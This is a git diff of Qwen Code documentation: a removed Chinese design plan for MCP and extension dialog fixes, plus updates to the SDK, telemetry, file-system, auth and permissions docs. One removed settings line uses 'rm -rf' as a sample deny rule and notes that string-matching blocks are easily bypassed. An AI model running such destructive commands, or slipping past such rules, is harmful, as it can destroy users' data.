-**代码修改**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - // View Tools 选项 - if (!server.isDisabled && server.toolCount > 0) { - result.push({ label: t('View Tools'), value: 'view-tools' }); - } - - // Reconnect 选项:只在未禁用且断开连接时显示 - if (!server.isDisabled && server.status === MCPServerStatus.DISCONNECTED) { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - // Enable/Disable 选项 - result.push({ - label: server.isDisabled ? t('Enable Server') : t('Disable Server'), - value: 'toggle-disable', - }); - - return result; -}, [server]); -``` - -**同时在 ServerListStep 中添加视觉提示**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerListStep.tsx -{server.isDisabled && ( - - {' '} - {t('(disabled - no connection possible)')} - -)} -``` - ---- - -### 问题 3: 【P1】禁用有个选择设置的 dialog,有点费解 - -#### 问题描述 - -- **现象**: 禁用服务器时会弹出一个对话框让用户选择禁用范围 (user/workspace) -- **问题**: 这个选择让用户体验困惑,特别是当 MCP server 在项目级配置时,在用户级别禁用就有点费解 -- **文档建议**: MCP server 在哪里,就在哪里禁用(如果 MCP server 在项目级,在用户级别禁用就有点费解) - -#### 根本原因分析 - -当前实现逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -const handleSelectDisableScope = useCallback( - async (scope: 'user' | 'workspace') => { - // 允许用户在 user 或 workspace 层面禁用服务器 - // 即使服务器配置在 workspace 层面,也允许在 user 层面禁用 - }, - [config, selectedServer, handleNavigateBack, reloadServers], -); -``` - -问题在于: - -1. 用户可以跨 scope 禁用服务器,造成配置混乱 -2. 不符合"在哪里配置就在哪里管理"的直觉 -3. 增加了不必要的复杂性 - -#### 解决方案 - -**方案 A: 根据服务器来源自动确定禁用 scope (强烈推荐)** - -**核心思路**: - -- User 级别的配置 → 只能在 User 级别禁用 -- Workspace 级别的配置 → 只能在 Workspace 级别禁用 -- Extension 级别的配置 → 不允许禁用 (只能卸载扩展) - -**代码修改**: - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx - -// 修改 handleDisable 函数 -const handleDisable = useCallback(() => { - if (!selectedServer) return; - - // 如果服务器已经被禁用,直接启用 - if (selectedServer.isDisabled) { - void handleEnableServer(); - return; - } - - // Extension 提供的服务器不允许禁用 - if (selectedServer.source === 'extension') { - debugLogger.warn( - `Cannot disable extension-provided server '${selectedServer.name}'`, - ); - // 显示提示信息 - return; - } - - // 根据服务器 scope 直接禁用,不再询问 - const scope = - selectedServer.scope === 'extension' - ? SettingScope.User - : selectedServer.scope === 'workspace' - ? SettingScope.Workspace - : SettingScope.User; - - // 直接执行禁用操作 - void executeDisable(scope); -}, [selectedServer, handleEnableServer]); - -// 新增执行禁用函数 -const executeDisable = useCallback( - async (scope: SettingScope) => { - if (!config || !selectedServer) return; - - try { - setIsLoading(true); - - const settings = loadSettings(); - const scopeSettings = settings.forScope(scope).settings; - const currentExcluded = scopeSettings.mcp?.excluded || []; - - if (!currentExcluded.includes(selectedServer.name)) { - const newExcluded = [...currentExcluded, selectedServer.name]; - settings.setValue(scope, 'mcp.excluded', newExcluded); - } - - const toolRegistry = config.getToolRegistry(); - if (toolRegistry) { - await toolRegistry.disableMcpServer(selectedServer.name); - } - - await reloadServers(); - handleNavigateBack(); - } catch (error) { - debugLogger.error( - `Error disabling server '${selectedServer.name}':`, - error, - ); - } finally { - setIsLoading(false); - } - }, - [config, selectedServer, reloadServers, handleNavigateBack], -); - -// 移除 DisableScopeSelectStep 相关的代码和导航逻辑 -``` - -**同时修改 UI 提示**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx - - - {t('Scope:')} - - - - {t(server.scope)} - {server.source === 'extension' && ( - - {' '}({t('provided by {{name}}', { name: server.config.extensionName })}) - - )} - - - - -// 禁用按钮文本根据 scope 调整 -{server.isDisabled ? ( - {t('Enable (will remove from exclusion list)')} -) : server.source === 'extension' ? ( - {t('Cannot disable extension server')} -) : ( - {t('Disable (in {{scope}})', { scope: server.scope })} -)} -``` - -**方案 B: 保留选择但改进 UX** - -如果确实需要支持跨 scope 禁用 (考虑到某些特殊场景),至少应该: - -1. 明确显示当前服务器的配置位置 -2. 说明不同选择的影响 -3. 给出推荐选项 - -但这会增加复杂性,不如方案 A 简洁明了。 - -#### 推荐方案:方案 A - ---- - -## 实施计划 - ---- - -## 问题 6: 【P2】Extension Management - /extension manage 报错 - -### 问题描述 - -- **现象**: 使用 `/extension manage` 命令时直接报错 -- **期望**: 应该能正常打开 Extension Management Dialog - -### 根本原因分析 - -#### 可能的原因 - -1. **命令拼写错误** (最可能) - - 正确的命令是 `/extensions manage` (复数形式) - - 用户可能输入了 `/extension manage` (单数形式) -2. **ExtensionManager 未正确初始化** - - ```typescript - // packages/cli/src/ui/commands/extensionsCommand.ts#L103-108 - async function listAction(_context: CommandContext, _args: string) { - const extensionManager = context.services.config?.getExtensionManager(); - if (!(extensionManager instanceof ExtensionManager)) { - debugLogger.error( - `Cannot ${context.invocation?.name} extensions in this environment`, - ); - return; // ❌ 这里直接返回,没有给用户任何提示 - } - // ... - } - ``` - -3. **环境限制** - - 某些环境下无法加载 ExtensionManager - - 沙箱模式可能限制扩展管理功能 - -#### 当前错误处理问题 - -- 如果 `getExtensionManager()` 返回 null 或不是 ExtensionManager 实例 -- 代码只是记录 debug 日志并静默返回 -- **用户看不到任何错误提示**,只会感到困惑 - -### 解决方案 - -#### 方案 A: 改进错误提示 (强烈推荐) - -**代码修改**: - -```typescript -// packages/cli/src/ui/commands/extensionsCommand.ts -async function listAction(context: CommandContext, _args: string) { - const extensionManager = context.services.config?.getExtensionManager(); - - if (!(extensionManager instanceof ExtensionManager)) { - debugLogger.error( - `Cannot ${context.invocation?.name} extensions in this environment`, - ); - - // ✅ 添加用户友好的错误提示 - context.ui.addItem( - { - type: MessageType.ERROR, - text: t( - 'Extension management is not available in the current environment. ' + - 'This feature may not be supported in your current mode or configuration.', - ), - }, - Date.now(), - ); - return; - } - - return { - type: 'dialog' as const, - dialog: 'extensions_manage' as const, - }; -} -``` - -#### 方案 B: 检查命令拼写并给出提示 - -在命令解析层面添加提示: - -```typescript -// packages/cli/src/ui/commands/registry.ts 或相关位置 -// 当检测到用户输入 '/extension'(单数) 时,给出提示 -if (commandName === 'extension') { - context.ui.addItem( - { - type: MessageType.INFO, - text: t('Did you mean "/extensions"? (plural form)'), - }, - Date.now(), - ); -} -``` - -#### 方案 C: 同时支持单复数形式 - -为了用户体验,可以同时支持两种形式: - -```typescript -// packages/cli/src/ui/commands/extensionsCommand.ts -export const extensionsCommand: SlashCommand = { - name: 'extensions', // 主要命令 (复数) - aliases: ['extension'], // ✅ 添加别名 (单数) - get description() { - return t('Manage extensions'); - }, - kind: CommandKind.BUILT_IN, - subCommands: [ - manageExtensionsCommand, - installCommand, - exploreExtensionsCommand, - ], - action: async (context, args) => - manageExtensionsCommand.action!(context, args), -}; -``` - -**注意**: 需要检查 SlashCommand 类型定义是否支持 `aliases` 属性 - -### 推荐方案 - -**采用方案 A + 方案 C**: - -1. 改进错误提示,让用户知道发生了什么 -2. 如果可能,同时支持单复数形式 - ---- - -## 实施计划 - -### Phase 1: 修复异常状态问题 (优先级:高) - -1. **修复问题 2.1**: 禁用后可查看工具 - - 修改 `ServerDetailStep.tsx` 的操作列表逻辑 - - 修改 `ToolListStep.tsx` 添加友好提示 - - 预计工时:2 小时 - -2. **修复问题 2.2**: 禁用后可重新连接 - - 修改 `ServerDetailStep.tsx` 的 reconnect 选项条件 - - 预计工时:1 小时 - -### Phase 2: 在 Dialog 中集成 Auth 功能 (优先级:高) - -3. **修复问题 1**: MCP Dialog 集成 OAuth 认证 - - 扩展 `MCP_MANAGEMENT_STEPS` 添加认证步骤 - - 在 `ServerDetailStep` 中添加"Authenticate"选项 - - 在 `MCPManagementDialog` 中实现认证逻辑 - - 更新 i18n 翻译文件 - - 预计工时:4 小时 - -### Phase 3: 改进禁用体验 (优先级:中) - -4. **修复问题 3**: 简化禁用流程 - - 移除 `DisableScopeSelectStep` - - 实现自动 scope 判断逻辑 - - 更新 UI 提示 - - 预计工时:4 小时 - -### Phase 4: UI 细节优化 (优先级:中) - -5. **修复问题 4**: Dialog 1 细节优化 - - 移除重复的来源显示 - - 优化错误信息显示逻辑 (只在有错误时显示) - - 移除多余的空格 - - 优化布局紧凑度 - - 预计工时:3 小时 - -6. **修复问题 5**: Dialog 2 细节优化 - - 统一来源颜色与其他部分一致 - - 添加功能说明 tooltip - - 统一选中色为 theme.text.accent - - 优化工具标注文案 (如"destructive, open-world") - - 移除不必要的序号 - - 预计工时:3 小时 - -### Phase 5: Extension Management 修复 (优先级:低) - -7. **修复问题 6**: Extension 命令报错 - - 改进错误提示 (方案 A) - - 考虑支持单复数形式 (方案 C) - - 预计工时:2 小时 - -### Phase 6: 测试与验证 (优先级:高) - -8. **回归测试** - - 更新所有相关测试用例 - - 手动测试各个场景 - - 确保没有破坏性变更 - - 预计工时:4 小时 - -**总预计工时**: 约 23 小时 (约 3 个工作日) - ---- - -## 影响评估 - -### 兼容性影响 - -- **Breaking Changes**: 无 -- **Deprecation**: 无 -- **新功能**: MCP Dialog 集成 OAuth 认证功能 - -### 需要更新的文档 - -1. `docs/developers/tools/mcp-server.md` - 更新 MCP 管理对话框使用说明 -2. `docs/users/features/mcp-servers.md` - 更新用户指南 -3. `docs/users/features/extensions.md` - 更新扩展管理说明 -4. 内联帮助文本和 i18n 文件 - -### 需要更新的测试 - -1. `packages/cli/src/ui/commands/mcpCommand.test.ts` -2. `packages/cli/src/ui/components/mcp/MCPManagementDialog.test.tsx` -3. `packages/cli/src/ui/components/mcp/steps/ServerDetailStep.test.tsx` -4. `packages/cli/src/ui/commands/extensionsCommand.test.ts` -5. `packages/cli/src/ui/components/extensions/ExtensionsManagerDialog.test.tsx` - ---- - -## 验收标准 - -### 问题 1 验收标准 - -- [ ] MCP Management Dialog 中显示"Authenticate"选项 (针对需要认证的服务器) -- [ ] 点击认证后能正确启动 OAuth 流程 -- [ ] 认证过程中显示友好的提示信息 -- [ ] 认证成功后自动刷新服务器状态 -- [ ] 认证失败时显示明确的错误信息 -- [ ] 保留 `/mcp auth` 命令作为备选方案 (可选) - -### 问题 2.1 验收标准 - -- [ ] 禁用的服务器不显示"查看工具"选项,或显示友好提示 -- [ ] 工具列表为空时,明确提示原因 -- [ ] 用户不会看到空的工具列表页面 - -### 问题 2.2 验收标准 - -- [ ] 禁用的服务器不显示"重新连接"选项 -- [ ] UI 逻辑自洽,不会出现矛盾的操作选项 -- [ ] 禁用状态下只能看到"启用"选项 - -### 问题 3 验收标准 - -- [ ] 禁用操作一键完成,无需选择 scope -- [ ] 禁用范围自动匹配配置范围 -- [ ] UI 明确显示服务器的配置位置 -- [ ] 用户体验流畅,无困惑点 - -### 问题 4 验收标准 (Dialog 1 细节优化) - -- [ ] 移除重复的来源显示 -- [ ] 只在有错误时显示"运行 qwen --debug..."提示 -- [ ] 没有错误时不显示多余的空格 -- [ ] 布局更加紧凑,接近 claude code 的视觉效果 - -### 问题 5 验收标准 (Dialog 2 细节优化) - -- [ ] 来源颜色与其他部分统一 -- [ ] 添加清晰的功能说明 -- [ ] 统一选中色为 theme.text.accent -- [ ] 工具标注文案更易懂 (如改为"Destructive, Open-world") -- [ ] 移除列表项前的序号 (1、2、3...) - -### 问题 6 验收标准 (Extension Management) - -- [ ] `/extensions manage` 命令能正常工作 -- [ ] 如果 ExtensionManager 不可用,显示明确的错误提示 -- [ ] 考虑支持 `/extension`(单数) 作为别名 (可选) -- [ ] 测试不同环境下的行为 (普通模式、沙箱模式等) - ---- - -## 技术细节补充 - -### 关键文件清单 - -``` -# MCP Management -packages/cli/src/ui/commands/mcpCommand.ts -packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -packages/cli/src/ui/components/mcp/steps/ServerListStep.tsx -packages/cli/src/ui/components/mcp/steps/ToolListStep.tsx -packages/cli/src/ui/components/mcp/types.ts -packages/core/src/tools/mcp-client-manager.ts -packages/core/src/config/config.ts - -# Extension Management -packages/cli/src/ui/commands/extensionsCommand.ts -packages/cli/src/ui/components/extensions/ExtensionsManagerDialog.tsx -packages/cli/src/ui/components/extensions/types.ts -packages/core/src/extension/extensionManager.ts -``` - -### 依赖关系 - -- MCP Management Dialog 依赖于 Config、ToolRegistry、PromptRegistry -- 禁用逻辑涉及 Settings 的多 scope 管理 -- 状态跟踪通过 `getMCPServerStatus` 和状态监听器实现 - -### 潜在风险点 - -1. **OAuth 认证流程**: 确保在 Dialog 中集成的认证功能不影响现有命令行认证 -2. **多 Scope 配置**: 确保自动 scope 判断不会误删其他 scope 的配置 -3. **Extension 集成**: 确保扩展提供的服务器正确处理 -4. **环境兼容性**: 确保 Extension Management 在不同环境下都能给出正确的错误提示 - ---- - -## 总结 - -本文档针对 0.12.0 版本体验反馈中提出的 **6 个问题** (3 个 P1 + 3 个 P2) 进行了详细分析,并提供了具体的解决方案。所有修改都遵循以下原则: - -1. **用户体验优先**: 简化操作流程,减少困惑 -2. **逻辑一致性**: 确保 UI 状态和行为逻辑自洽 -3. **向后兼容**: 避免破坏性变更 -4. **代码质量**: 简化代码结构,提高可维护性 -5. **错误友好**: 提供清晰、有帮助的错误信息 - -建议按优先级分阶段实施,确保每个问题都得到妥善解决。 diff --git a/docs/developers/development/telemetry.md b/docs/developers/development/telemetry.md index f5faee40e..94859048e 100644 --- a/docs/developers/development/telemetry.md +++ b/docs/developers/development/telemetry.md @@ -139,16 +139,16 @@ Logs are timestamped records of specific events. The following events are logged - `qwen-code.config`: This event occurs once at startup with the CLI's configuration. - **Attributes**: - `model` (string) - - `embedding_model` (string) - `sandbox_enabled` (boolean) - `core_tools_enabled` (string) - `approval_mode` (string) - - `api_key_enabled` (boolean) - - `vertex_ai_enabled` (boolean) - - `code_assist_enabled` (boolean) - - `log_prompts_enabled` (boolean) - `file_filtering_respect_git_ignore` (boolean) - `debug_mode` (boolean) + - `truncate_tool_output_threshold` (number) + - `truncate_tool_output_lines` (number) + - `hooks` (string, comma-separated hook event types, omitted if hooks disabled) + - `ide_enabled` (boolean) + - `interactive_shell_enabled` (boolean) - `mcp_servers` (string) - `output_format` (string: "text" or "json") diff --git a/docs/developers/sdk-typescript.md b/docs/developers/sdk-typescript.md index 46625e840..4c705f068 100644 --- a/docs/developers/sdk-typescript.md +++ b/docs/developers/sdk-typescript.md @@ -63,6 +63,7 @@ Creates a new query session with the Qwen Code. | `permissionMode` | `'default' \| 'plan' \| 'auto-edit' \| 'yolo'` | `'default'` | Permission mode controlling tool execution approval. See [Permission Modes](#permission-modes) for details. | | `canUseTool` | `CanUseTool` | - | Custom permission handler for tool execution approval. Invoked when a tool requires confirmation. Must respond within 60 seconds or the request will be auto-denied. See [Custom Permission Handler](#custom-permission-handler). | | `env` | `Record` | - | Environment variables to pass to the Qwen Code process. Merged with the current process environment. | +| `systemPrompt` | `string \| QuerySystemPromptPreset` | - | System prompt configuration for the main session. Use a string to fully override the built-in Qwen Code system prompt, or a preset object to keep the built-in prompt and append extra instructions. | | `mcpServers` | `Record` | - | MCP (Model Context Protocol) servers to connect. Supports external servers (stdio/SSE/HTTP) and SDK-embedded servers. External servers are configured with transport options like `command`, `args`, `url`, `httpUrl`, etc. SDK servers use `{ type: 'sdk', name: string, instance: Server }`. | | `abortController` | `AbortController` | - | Controller to cancel the query session. Call `abortController.abort()` to terminate the session and cleanup resources. | | `debug` | `boolean` | `false` | Enable debug mode for verbose logging from the CLI process. | @@ -248,6 +249,36 @@ const result = query({ }); ``` +### Override the System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Say hello in one sentence.', + options: { + systemPrompt: 'You are a terse assistant. Answer in exactly one sentence.', + }, +}); +``` + +### Append to the Built-in System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Review the current directory.', + options: { + systemPrompt: { + type: 'preset', + preset: 'qwen_code', + append: 'Be terse and focus on concrete findings.', + }, + }, +}); +``` + ### With SDK-Embedded MCP Servers The SDK provides `tool` and `createSdkMcpServer` to create MCP servers that run in the same process as your SDK application. This is useful when you want to expose custom tools to the AI without running a separate server process. diff --git a/docs/developers/tools/file-system.md b/docs/developers/tools/file-system.md index bfa6de8d0..118f5e0b6 100644 --- a/docs/developers/tools/file-system.md +++ b/docs/developers/tools/file-system.md @@ -24,7 +24,7 @@ Qwen Code provides a comprehensive suite of tools for interacting with the local ## 2. `read_file` (ReadFile) -`read_file` reads and returns the content of a specified file. This tool handles text, images (PNG, JPG, GIF, WEBP, SVG, BMP), and PDF files. For text files, it can read specific line ranges. Other binary file types are generally skipped. +`read_file` reads and returns the content of a specified file. This tool handles text files and media files (images, PDFs, audio, video) whose modality is supported by the current model. For text files, it can read specific line ranges. Media files whose modality is not supported by the current model are rejected with a helpful error message. Other binary file types are generally skipped. - **Tool name:** `read_file` - **Display name:** ReadFile @@ -35,11 +35,12 @@ Qwen Code provides a comprehensive suite of tools for interacting with the local - `limit` (number, optional): For text files, the maximum number of lines to read. If omitted, reads a default maximum (e.g., 2000 lines) or the entire file if feasible. - **Behavior:** - For text files: Returns the content. If `offset` and `limit` are used, returns only that slice of lines. Indicates if content was truncated due to line limits or line length limits. - - For image and PDF files: Returns the file content as a base64-encoded data structure suitable for model consumption. + - For media files (images, PDFs, audio, video): If the current model supports the file's modality, returns the file content as a base64-encoded `inlineData` object. If the model does not support the modality, returns an error message with guidance (e.g., suggesting skills or external tools). - For other binary files: Attempts to identify and skip them, returning a message indicating it's a generic binary file. - **Output:** (`llmContent`): - For text files: The file content, potentially prefixed with a truncation message (e.g., `[File content truncated: showing lines 1-100 of 500 total lines...]\nActual file content...`). - - For image/PDF files: An object containing `inlineData` with `mimeType` and base64 `data` (e.g., `{ inlineData: { mimeType: 'image/png', data: 'base64encodedstring' } }`). + - For supported media files: An object containing `inlineData` with `mimeType` and base64 `data` (e.g., `{ inlineData: { mimeType: 'image/png', data: 'base64encodedstring' } }`). + - For unsupported media files: An error message string explaining that the current model does not support this modality, with suggestions for alternatives. - For other binary files: A message like `Cannot display content of binary file: /path/to/data.bin`. - **Confirmation:** No. @@ -164,4 +165,63 @@ grep_search(pattern="function", glob="*.js", limit=10) - On failure: An error message explaining the reason (e.g., `Failed to edit, 0 occurrences found...`, `Failed to edit because the text matches multiple locations...`). - **Confirmation:** Yes. Shows a diff of the proposed changes and asks for user approval before writing to the file. +## File encoding and platform-specific behavior + +### Encoding detection and preservation + +When reading files, Qwen Code detects the file's encoding using a multi-step strategy: + +1. **UTF-8** — tried first (most modern tooling outputs UTF-8) +2. **chardet** — statistical detection for non-UTF-8 content +3. **System encoding** — falls back to the OS code page (Windows `chcp` / Unix `LANG`) + +Both `write_file` and `edit` preserve the original encoding and BOM (byte order mark) of existing files. If a file was read as GBK with a UTF-8 BOM, it will be written back the same way. + +### Configuring default encoding for new files + +The `defaultFileEncoding` setting controls encoding for **newly created** files (not edits to existing files): + +| Value | Behavior | +| ----------- | --------------------------------------------------------------------------- | +| _(not set)_ | UTF-8 without BOM, with automatic platform-specific adjustments (see below) | +| `utf-8` | UTF-8 without BOM, no automatic adjustments | +| `utf-8-bom` | UTF-8 with BOM for all new files | + +Set it in `.qwen/settings.json` or `~/.qwen/settings.json`: + +```json +{ + "general": { + "defaultFileEncoding": "utf-8-bom" + } +} +``` + +### Windows: CRLF for batch files + +On Windows, `.bat` and `.cmd` files are automatically written with CRLF (`\r\n`) line endings. This is required because `cmd.exe` uses CRLF as its line delimiter — LF-only endings can break multi-line `if`/`else`, `goto` labels, and `for` loops. This applies regardless of encoding settings and only on Windows. + +### Windows: UTF-8 BOM for PowerShell scripts + +On Windows with a **non-UTF-8 system code page** (e.g. GBK/cp936, Big5/cp950, Shift_JIS/cp932), newly created `.ps1` files are automatically written with a UTF-8 BOM. This is necessary because Windows PowerShell 5.1 (the version built into Windows 10/11) reads BOM-less scripts using the system's ANSI code page. Without a BOM, any non-ASCII characters in the script will be misinterpreted. + +This automatic BOM only applies when: + +- The platform is Windows +- The system code page is not UTF-8 (not code page 65001) +- The file is a new `.ps1` file (existing files keep their original encoding) +- The user has **not** explicitly set `defaultFileEncoding` in settings + +PowerShell 7+ (pwsh) defaults to UTF-8 and handles BOM transparently, so the BOM is harmless there. + +If you explicitly set `defaultFileEncoding` to `"utf-8"`, the automatic BOM is disabled — this is an intentional escape hatch for repositories or tooling that reject BOMs. + +### Summary + +| File type | Platform | Automatic behavior | +| -------------- | ----------------------------- | --------------------------- | +| `.bat`, `.cmd` | Windows | CRLF line endings | +| `.ps1` | Windows (non-UTF-8 code page) | UTF-8 BOM on new files | +| All others | All | UTF-8 without BOM (default) | + These file system tools provide a foundation for Qwen Code to understand and interact with your local project context. diff --git a/docs/users/configuration/auth.md b/docs/users/configuration/auth.md index 3e15aa462..445e42bc5 100644 --- a/docs/users/configuration/auth.md +++ b/docs/users/configuration/auth.md @@ -21,6 +21,12 @@ Start the CLI and follow the browser flow: qwen ``` +Or authenticate directly without starting a session: + +```bash +qwen auth qwen-oauth +``` + > [!note] > > In non-interactive or headless environments (e.g., CI, SSH, containers), you typically **cannot** complete the OAuth browser login flow. @@ -44,6 +50,20 @@ Alibaba Cloud Coding Plan is available in two regions: ### Interactive setup +You can set up Coding Plan authentication in two ways: + +**Option A: From the terminal (recommended for first-time setup)** + +```bash +# Interactive — prompts for region and API key +qwen auth coding-plan + +# Or non-interactive — pass region and key directly +qwen auth coding-plan --region china --key sk-sp-xxxxxxxxx +``` + +**Option B: Inside a Qwen Code session** + Enter `qwen` in the terminal to launch Qwen Code, then run the `/auth` command and select **Alibaba Cloud Coding Plan**. Choose your region, then enter your `sk-sp-xxxxxxxxx` key. After authentication, use the `/model` command to switch between all Alibaba Cloud Coding Plan supported models (including qwen3.5-plus, qwen3-coder-plus, qwen3-coder-next, qwen3-max, glm-4.7, and kimi-k2.5). @@ -290,6 +310,55 @@ qwen --model "qwen3-coder-plus" qwen --model "qwen3.5-plus" ``` +## `qwen auth` CLI command + +In addition to the in-session `/auth` slash command, Qwen Code provides a standalone `qwen auth` CLI command for managing authentication directly from the terminal — without starting an interactive session first. + +### Interactive mode + +Run `qwen auth` without arguments to get an interactive menu: + +```bash +qwen auth +``` + +You'll see a selector with arrow-key navigation: + +``` +Select authentication method: + +> Qwen OAuth - Free · Up to 1,000 requests/day · Qwen latest models + Alibaba Cloud Coding Plan - Paid · Up to 6,000 requests/5 hrs · All Alibaba Cloud Coding Plan Models + +(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit) +``` + +### Subcommands + +| Command | Description | +| ---------------------------------------------------- | ------------------------------------------------- | +| `qwen auth` | Interactive authentication setup | +| `qwen auth qwen-oauth` | Authenticate with Qwen OAuth | +| `qwen auth coding-plan` | Authenticate with Alibaba Cloud Coding Plan | +| `qwen auth coding-plan --region china --key sk-sp-…` | Non-interactive Coding Plan setup (for scripting) | +| `qwen auth status` | Show current authentication status | + +**Examples:** + +```bash +# Authenticate with Qwen OAuth directly +qwen auth qwen-oauth + +# Set up Coding Plan interactively (prompts for region and key) +qwen auth coding-plan + +# Set up Coding Plan non-interactively (useful for CI/scripting) +qwen auth coding-plan --region china --key sk-sp-xxxxxxxxx + +# Check your current auth configuration +qwen auth status +``` + ## Security notes - Don't commit API keys to version control. diff --git a/docs/users/configuration/settings.md b/docs/users/configuration/settings.md index c648a231f..1c7c20404 100644 --- a/docs/users/configuration/settings.md +++ b/docs/users/configuration/settings.md @@ -129,7 +129,6 @@ Settings are organized into categories. All settings should be placed within the | -------------------------------------------------- | ------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | | `model.name` | string | The Qwen model to use for conversations. | `undefined` | | `model.maxSessionTurns` | number | Maximum number of user/model/tool turns to keep in a session. -1 means unlimited. | `-1` | -| `model.summarizeToolOutput` | object | Enables or disables the summarization of tool output. You can specify the token budget for the summarization using the `tokenBudget` setting. Note: Currently only the `run_shell_command` tool is supported. For example `{"run_shell_command": {"tokenBudget": 2000}}` | `undefined` | | `model.generationConfig` | object | Advanced overrides passed to the underlying content generator. Supports request controls such as `timeout`, `maxRetries`, `enableCacheControl`, `contextWindowSize` (override model's context window size), `modalities` (override auto-detected input modalities), `customHeaders` (custom HTTP headers for API requests), and `extra_body` (additional body parameters for OpenAI-compatible API requests only), along with fine-tuning knobs under `samplingParams` (for example `temperature`, `top_p`, `max_tokens`). Leave unset to rely on provider defaults. | `undefined` | | `model.chatCompression.contextPercentageThreshold` | number | Sets the threshold for chat history compression as a percentage of the model's total token limit. This is a value between 0 and 1 that applies to both automatic compression and the manual `/compress` command. For example, a value of `0.6` will trigger compression when the chat history exceeds 60% of the token limit. Use `0` to disable compression entirely. | `0.7` | | `model.skipNextSpeakerCheck` | boolean | Skip the next speaker check. | `false` | @@ -213,18 +212,114 @@ If you are experiencing performance issues with file searching (e.g., with `@` c | ------------------------------------ | ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `tools.sandbox` | boolean or string | Sandbox execution environment (can be a boolean or a path string). | `undefined` | | | `tools.shell.enableInteractiveShell` | boolean | Use `node-pty` for an interactive shell experience. Fallback to `child_process` still applies. | `false` | | -| `tools.core` | array of strings | This can be used to restrict the set of built-in tools with an allowlist. You can also specify command-specific restrictions for tools that support it, like the `run_shell_command` tool. For example, `"tools.core": ["run_shell_command(ls -l)"]` will only allow the `ls -l` command to be executed. | `undefined` | | -| `tools.exclude` | array of strings | Tool names to exclude from discovery. You can also specify command-specific restrictions for tools that support it, like the `run_shell_command` tool. For example, `"tools.exclude": ["run_shell_command(rm -rf)"]` will block the `rm -rf` command. **Security Note:** Command-specific restrictions in `tools.exclude` for `run_shell_command` are based on simple string matching and can be easily bypassed. This feature is **not a security mechanism** and should not be relied upon to safely execute untrusted code. It is recommended to use `tools.core` to explicitly select commands that can be executed. | `undefined` | | -| `tools.allowed` | array of strings | A list of tool names that will bypass the confirmation dialog. This is useful for tools that you trust and use frequently. For example, `["run_shell_command(git)", "run_shell_command(npm test)"]` will skip the confirmation dialog to run any `git` and `npm test` commands. | `undefined` | | +| `tools.core` | array of strings | **Deprecated.** Will be removed in next version. Use `permissions.allow` + `permissions.deny` instead. Restricts built-in tools to an allowlist. All tools not in the list are disabled. | `undefined` | | +| `tools.exclude` | array of strings | **Deprecated.** Use `permissions.deny` instead. Tool names to exclude from discovery. Automatically migrated to the `permissions` format on first load. | `undefined` | | +| `tools.allowed` | array of strings | **Deprecated.** Use `permissions.allow` instead. Tool names that bypass the confirmation dialog. Automatically migrated to the `permissions` format on first load. | `undefined` | | | `tools.approvalMode` | string | Sets the default approval mode for tool usage. | `default` | Possible values: `plan` (analyze only, do not modify files or execute commands), `default` (require approval before file edits or shell commands run), `auto-edit` (automatically approve file edits), `yolo` (automatically approve all tool calls) | | `tools.discoveryCommand` | string | Command to run for tool discovery. | `undefined` | | | `tools.callCommand` | string | Defines a custom shell command for calling a specific tool that was discovered using `tools.discoveryCommand`. The shell command must meet the following criteria: It must take function `name` (exactly as in [function declaration](https://ai.google.dev/gemini-api/docs/function-calling#function-declarations)) as first command line argument. It must read function arguments as JSON on `stdin`, analogous to [`functionCall.args`](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/inference#functioncall). It must return function output as JSON on `stdout`, analogous to [`functionResponse.response.content`](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/inference#functionresponse). | `undefined` | | | `tools.useRipgrep` | boolean | Use ripgrep for file content search instead of the fallback implementation. Provides faster search performance. | `true` | | | `tools.useBuiltinRipgrep` | boolean | Use the bundled ripgrep binary. When set to `false`, the system-level `rg` command will be used instead. This setting is only effective when `tools.useRipgrep` is `true`. | `true` | | -| `tools.enableToolOutputTruncation` | boolean | Enable truncation of large tool outputs. | `true` | Requires restart: Yes | | `tools.truncateToolOutputThreshold` | number | Truncate tool output if it is larger than this many characters. Applies to Shell, Grep, Glob, ReadFile and ReadManyFiles tools. | `25000` | Requires restart: Yes | | `tools.truncateToolOutputLines` | number | Maximum lines or entries kept when truncating tool output. Applies to Shell, Grep, Glob, ReadFile and ReadManyFiles tools. | `1000` | Requires restart: Yes | +> [!note] +> +> **Migrating from `tools.core` / `tools.exclude` / `tools.allowed`:** These legacy settings are **deprecated** and automatically migrated to the new `permissions` format on first load. Prefer configuring `permissions.allow` / `permissions.deny` directly. Use `/permissions` to manage rules interactively. + +#### permissions + +The permissions system provides fine-grained control over which tools can run, which require confirmation, and which are blocked. + +**Decision priority (highest first): `deny` > `ask` > `allow` > _(default/interactive mode)_** + +The first matching rule wins. Rules use the format `"ToolName"` or `"ToolName(specifier)"`. + +| Setting | Type | Description | Default | +| ------------------- | ---------------- | ---------------------------------------------------------------------------------------------------------------- | ----------- | +| `permissions.allow` | array of strings | Rules for auto-approved tool calls (no confirmation needed). Merged across all scopes (user + project + system). | `undefined` | +| `permissions.ask` | array of strings | Rules for tool calls that always require user confirmation. Takes priority over `allow`. | `undefined` | +| `permissions.deny` | array of strings | Rules for blocked tool calls. Highest priority — overrides both `allow` and `ask`. | `undefined` | + +**Tool name aliases 